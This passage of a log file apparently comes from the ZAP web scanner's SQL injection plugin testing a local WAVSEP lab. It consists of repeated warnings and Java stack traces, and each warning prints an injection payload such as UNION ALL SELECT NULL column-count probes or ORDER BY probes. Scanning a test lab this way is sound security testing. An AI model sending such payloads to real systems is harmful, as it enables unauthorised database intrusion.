org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682490 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682491 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682492 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682493 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682494 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682494 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 7083-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 7083-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682495 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682496 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682497 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682498 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682498 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682499 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682500 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at 